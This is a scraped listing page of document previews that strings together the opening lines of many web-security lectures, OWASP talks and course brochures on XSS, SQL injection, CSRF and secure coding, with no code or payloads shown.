Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation
ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More information2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.
Secure Coding CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.
1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM
More informationOWASP Top 10 The Ten Most Critical Web Application Security Risks
OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationSecure Coding and Code Review. Berlin : 2012
Secure Coding and Code Review Berlin : 2012 Outline Overview of top vulnerabilities Code review practice Secure design / writing secure code Write some secure code Review a volunteer's code Top Problems
More informationLECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security
Repetition Lect 7 LECT 8 WEB SECURITY Access control Runtime protection Trusted computing Java as basic model for signed code Trusted Computing Group TPM ARM TrustZone Mobile Network security GSM security
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationAguascalientes Local Chapter. Kickoff
Aguascalientes Local Chapter Kickoff juan.gama@owasp.org About Us Chapter Leader Juan Gama Application Security Engineer @ Aspect Security 9+ years in Appsec, Testing, Development Maintainer of OWASP Benchmark
More informationOWASP TOP 10. By: Ilia
OWASP TOP 10 By: Ilia Alshanetsky @iliaa ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado WEB SECURITY THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN WEB
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationCSWAE Certified Secure Web Application Engineer
CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
More informationCertified Secure Web Application Engineer
Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More information